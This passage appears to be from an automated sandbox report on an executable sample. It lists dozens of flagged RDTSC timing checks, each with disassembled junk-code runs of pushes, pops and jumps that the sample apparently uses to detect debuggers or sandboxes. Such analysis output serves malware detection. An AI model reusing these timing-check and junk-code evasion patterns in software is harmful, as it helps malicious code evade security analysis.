                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CAD039 second address: CAD052 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2A91294716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F2A9129471Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CAD052 second address: CAD05C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2A913FCE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CAD05C second address: CAD068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F2A91294716h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CAD068 second address: CAD06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CAD5B3 second address: CAD5F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294721h 0x00000007 pushad 0x00000008 jno 00007F2A91294716h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jnl 00007F2A91294716h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007F2A9129472Ah 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CAD5F8 second address: CAD5FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CAD5FC second address: CAD602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CADAA5 second address: CADAB5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2A913FCEA2h 0x00000008 js 00007F2A913FCE96h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CADC2E second address: CADC4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A9129471Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a ja 00007F2A91294716h 0x00000010 jng 00007F2A91294716h 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CB227C second address: CB2280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CB242A second address: CB242F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CB24AD second address: CB24B7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2A913FCE9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: CB24B7 second address: CB24E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D3632h], eax 0x0000000d jnl 00007F2A9129471Ah 0x00000013 mov dx, F974h 0x00000017 push 00000004h 0x00000019 xor edx, dword ptr [ebp+122D34ABh] 0x0000001f mov dh, 62h 0x00000021 push A4259E95h 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: BCAB4E second address: BCAB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B603F8 second address: 4B603FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B603FC second address: 4B60417 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B60417 second address: 4B6043B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B6043B second address: 4B6043F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B6043F second address: 4B60459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B904B1 second address: 4B904C2 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, di 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B904C2 second address: 4B904C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B904C6 second address: 4B904CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B904CA second address: 4B904D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B904D0 second address: 4B90512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F2A913FCEA0h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F2A913FCEA7h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90512 second address: 4B905C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F2A9129471Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bx, BB34h 0x00000015 pushfd 0x00000016 jmp 00007F2A9129471Dh 0x0000001b or eax, 282D92F6h 0x00000021 jmp 00007F2A91294721h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ecx 0x00000029 jmp 00007F2A9129471Eh 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 mov al, 20h 0x00000032 pushfd 0x00000033 jmp 00007F2A91294723h 0x00000038 jmp 00007F2A91294723h 0x0000003d popfd 0x0000003e popad 0x0000003f push eax 0x00000040 jmp 00007F2A91294729h 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 mov edi, ecx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B905C7 second address: 4B905E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 5739E808h 0x00000009 popad 0x0000000a lea eax, dword ptr [ebp-04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2A913FCE9Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B905E0 second address: 4B90607 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A9129471Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A91294725h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90607 second address: 4B90617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A913FCE9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90617 second address: 4B90625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90625 second address: 4B9062C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B9062C second address: 4B9065C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294722h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A91294727h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B906BA second address: 4B906BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B906BE second address: 4B906C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B906C4 second address: 4B9071F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F2A913FCE9Eh 0x00000014 adc cx, 2BD8h 0x00000019 jmp 00007F2A913FCE9Bh 0x0000001e popfd 0x0000001f push ecx 0x00000020 mov eax, edx 0x00000022 pop ebx 0x00000023 popad 0x00000024 mov esi, eax 0x00000026 jmp 00007F2A913FCE9Eh 0x0000002b je 00007F2A913FCEFDh 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 movsx edi, ax 0x00000037 push esi 0x00000038 pop edi 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B9071F second address: 4B90725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90725 second address: 4B90729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90729 second address: 4B9072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B90750 second address: 4B907FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007F2A913FCE9Dh 0x0000000b sub cx, 5636h 0x00000010 jmp 00007F2A913FCEA1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, esi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F2A913FCE9Ch 0x00000022 jmp 00007F2A913FCEA5h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F2A913FCEA0h 0x0000002e add ch, FFFFFFB8h 0x00000031 jmp 00007F2A913FCE9Bh 0x00000036 popfd 0x00000037 popad 0x00000038 pop esi 0x00000039 pushad 0x0000003a mov ax, 980Bh 0x0000003e call 00007F2A913FCEA0h 0x00000043 movzx esi, dx 0x00000046 pop ebx 0x00000047 popad 0x00000048 leave 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F2A913FCEA9h 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B907FB second address: 4B80032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d sub esp, 04h 0x00000010 xor ebx, ebx 0x00000012 cmp eax, 00000000h 0x00000015 je 00007F2A9129487Ah 0x0000001b mov dword ptr [esp], 0000000Dh 0x00000022 call 00007F2A954208B1h 0x00000027 mov edi, edi 0x00000029 jmp 00007F2A91294726h 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F2A91294727h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80032 second address: 4B8003A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B8003A second address: 4B80060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F2A91294727h 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80060 second address: 4B80064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80064 second address: 4B8006A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B8006A second address: 4B800D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F2A913FCEA0h 0x00000010 sub esp, 2Ch 0x00000013 jmp 00007F2A913FCEA0h 0x00000018 xchg eax, ebx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007F2A913FCEA3h 0x00000022 and ax, B08Eh 0x00000027 jmp 00007F2A913FCEA9h 0x0000002c popfd 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B800D4 second address: 4B800D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B800D8 second address: 4B8010C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F2A913FCEA7h 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2A913FCEA0h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B8010C second address: 4B80112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80112 second address: 4B80118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80118 second address: 4B8012E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2A9129471Bh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B8012E second address: 4B80142 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4CCDD1BAh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80142 second address: 4B80146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80146 second address: 4B8014C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B8014C second address: 4B80161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A91294721h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80161 second address: 4B80165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80165 second address: 4B80181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2A9129471Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80181 second address: 4B8019E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B801FB second address: 4B80201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80201 second address: 4B80218 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2A913FCEA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80218 second address: 4B8024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test al, al 0x00000009 jmp 00007F2A9129471Eh 0x0000000e je 00007F2A91294917h 0x00000014 jmp 00007F2A91294720h 0x00000019 lea ecx, dword ptr [ebp-14h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ch, 06h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B8024E second address: 4B80263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A913FCEA1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80263 second address: 4B8028C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-14h], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2A9129471Dh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B802B5 second address: 4B802BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B802BB second address: 4B8031E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F2A91294722h 0x00000010 and si, E9E8h 0x00000015 jmp 00007F2A9129471Bh 0x0000001a popfd 0x0000001b jmp 00007F2A91294728h 0x00000020 popad 0x00000021 mov dword ptr [esp], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F2A91294727h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B8031E second address: 4B80336 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A913FCEA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80364 second address: 4B80465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2A91294727h 0x00000009 or cl, FFFFFFFEh 0x0000000c jmp 00007F2A91294729h 0x00000011 popfd 0x00000012 movzx ecx, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test eax, eax 0x0000001a jmp 00007F2A91294723h 0x0000001f jg 00007F2B021727EBh 0x00000025 jmp 00007F2A91294726h 0x0000002a js 00007F2A91294773h 0x00000030 pushad 0x00000031 movzx esi, dx 0x00000034 pushfd 0x00000035 jmp 00007F2A91294723h 0x0000003a xor al, 0000001Eh 0x0000003d jmp 00007F2A91294729h 0x00000042 popfd 0x00000043 popad 0x00000044 cmp dword ptr [ebp-14h], edi 0x00000047 jmp 00007F2A9129471Eh 0x0000004c jne 00007F2B02172791h 0x00000052 jmp 00007F2A91294720h 0x00000057 mov ebx, dword ptr [ebp+08h] 0x0000005a jmp 00007F2A91294720h 0x0000005f lea eax, dword ptr [ebp-2Ch] 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F2A91294727h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80465 second address: 4B8047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A913FCEA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B8047D second address: 4B8052E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A9129471Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d push ecx 0x0000000e push ebx 0x0000000f pop eax 0x00000010 pop edi 0x00000011 push ecx 0x00000012 pushfd 0x00000013 jmp 00007F2A91294723h 0x00000018 or cx, 34FEh 0x0000001d jmp 00007F2A91294729h 0x00000022 popfd 0x00000023 pop eax 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 mov dl, al 0x00000029 push edi 0x0000002a mov eax, 661C7F5Bh 0x0000002f pop esi 0x00000030 popad 0x00000031 xchg eax, esi 0x00000032 jmp 00007F2A91294727h 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b call 00007F2A9129471Bh 0x00000040 pop eax 0x00000041 pushfd 0x00000042 jmp 00007F2A91294729h 0x00000047 sbb al, FFFFFFF6h 0x0000004a jmp 00007F2A91294721h 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B8052E second address: 4B80587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2A913FCEA7h 0x00000009 adc cx, AF2Eh 0x0000000e jmp 00007F2A913FCEA9h 0x00000013 popfd 0x00000014 movzx ecx, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F2A913FCEA4h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80587 second address: 4B8058B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B8058B second address: 4B80591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B80591 second address: 4B805BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A9129471Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F2A91294720h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B805BB second address: 4B805BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B805BF second address: 4B805C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B805C5 second address: 4B805CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B805CB second address: 4B805CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B805CF second address: 4B8061E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F2A913FCEA6h 0x00000011 pop ecx 0x00000012 pushfd 0x00000013 jmp 00007F2A913FCE9Bh 0x00000018 add cx, 755Eh 0x0000001d jmp 00007F2A913FCEA9h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B8061E second address: 4B8062E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A9129471Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: 4B8062E second address: 4B80632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
